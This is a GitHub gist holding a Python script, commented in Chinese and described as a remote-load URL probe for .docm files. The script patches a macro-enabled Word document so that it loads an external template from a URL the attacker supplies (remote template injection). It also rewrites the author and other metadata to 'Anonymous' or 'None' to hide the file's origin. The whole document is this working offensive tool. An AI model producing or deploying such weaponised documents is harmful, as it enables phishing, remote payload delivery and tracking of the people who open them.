Skip to content

Instantly share code, notes, and snippets.

@akkuman
Created November 20, 2020 07:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save akkuman/bff0535c159afe5d28ac011c03db734a to your computer and use it in GitHub Desktop.
Save akkuman/bff0535c159afe5d28ac011c03db734a to your computer and use it in GitHub Desktop.
docm远程加载url探针
import os
import uuid
import shutil
import zipfile
import lxml.etree
def inplace_change(filename, old_string, new_string):
"""打开文件替换字符串"""
s = ''
with open(filename) as f:
s = f.read()
if old_string not in s:
return
with open(filename, 'w') as f:
s = s.replace(old_string, new_string)
f.write(s)
def zip_folder(dirpath, zippath):
"""将一个文件夹下所有文件zip打包
Args:
dirpath: 需要打包的文件夹路径
zippath: 输出的zip文件的路径
"""
with zipfile.ZipFile(zippath, 'w') as zip_handler:
for root, dirs, files in os.walk(dirpath):
for file in files:
# 主要是为了zip打包层级考虑
abspath = os.path.join(root, file)
relpath = os.path.relpath(abspath, dirpath)
zip_handler.write(abspath, relpath)
def docpatch(document_path: str, url: str, tempdir: str) -> str:
"""修改docm文件支持远程加载url
Args:
document_path: docm文件路径
url: 需要加载的url
tempdir: 存放临时文件的目录
Returns:
处理后的docm文件的地址
References:
- https://github.com/chrismaddalena/DocPatch
"""
uid_name = str(uuid.uuid4())
_tempdir = os.path.join(tempdir, uid_name)
core_xml_loc = f"{_tempdir}/docProps/core.xml"
settings_file_loc = f"{_tempdir}/word/settings.xml"
theme_file_loc = f"{_tempdir}/word/_rels/settings.xml.rels"
themes_value = f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" \
Target="{url}" TargetMode="External"/></Relationships>'
# 创建临时文件夹
if not os.path.exists(_tempdir):
os.makedirs(_tempdir)
# 解压doc文件编辑XML
try:
with zipfile.ZipFile(document_path, 'r') as zip_handler:
zip_handler.extractall(_tempdir)
except Exception as e:
print("[!] Oops! The document could not be unzipped. Are you sure it's a valid macro-enabled Word document?")
print(f"L.. Details: {str(e)}")
# 编辑 settings.xml 和 settings.xml.rels 中的样式表
inplace_change(settings_file_loc, '</w:settings>', '<w:attachedTemplate r:id="rId1"/></w:settings>')
with open(theme_file_loc, 'w') as fh:
fh.write(themes_value)
# 编辑 docProps/core.xml 重写元数据
# 声明xml解析时的命名空间
dc_ns = {'dc': 'http://purl.org/dc/elements/1.1/'}
cp_ns = {'cp': 'http://schemas.openxmlformats.org/package/2006/metadata/core-properties'}
# 最后修改者名字
user_name = "Anonymous"
# 解析xml并更新
root = lxml.etree.parse(core_xml_loc)
creator = root.xpath('//dc:creator', namespaces=dc_ns)
last_modified_user = root.xpath('//cp:lastModifiedBy', namespaces=cp_ns)
if creator:
creator[0].text = user_name
if last_modified_user:
last_modified_user[0].text = user_name
tags = root.xpath('//cp:keywords', namespaces=cp_ns)
if tags:
tags[0].text = "None"
description = root.xpath('//dc:description', namespaces=dc_ns)
if description:
description[0].text = "None"
# 更新写入 core.xml 内容
with open(core_xml_loc, 'wb') as fh:
fh.write(b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n')
fh.write(lxml.etree.tostring(root))
# 使用新的XML打包doc
suffix = os.path.splitext(document_path)[1]
result_filename = f'{uid_name}{suffix}'
result_filepath = os.path.join(tempdir, result_filename)
zip_folder(_tempdir, result_filepath)
# 删除临时目录
shutil.rmtree(_tempdir)
return result_filepath
if __name__ == "__main__":
import sys
if len(sys.argv) != 3:
print(f'python {sys.argv[0]} docm文件 加载的url')
sys.exit(1)
docpath = os.path.abspath(sys.argv[1])
url = sys.argv[2]
tempdir = os.path.dirname(docpath)
res = docpatch(docpath, url, tempdir)
print(res)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment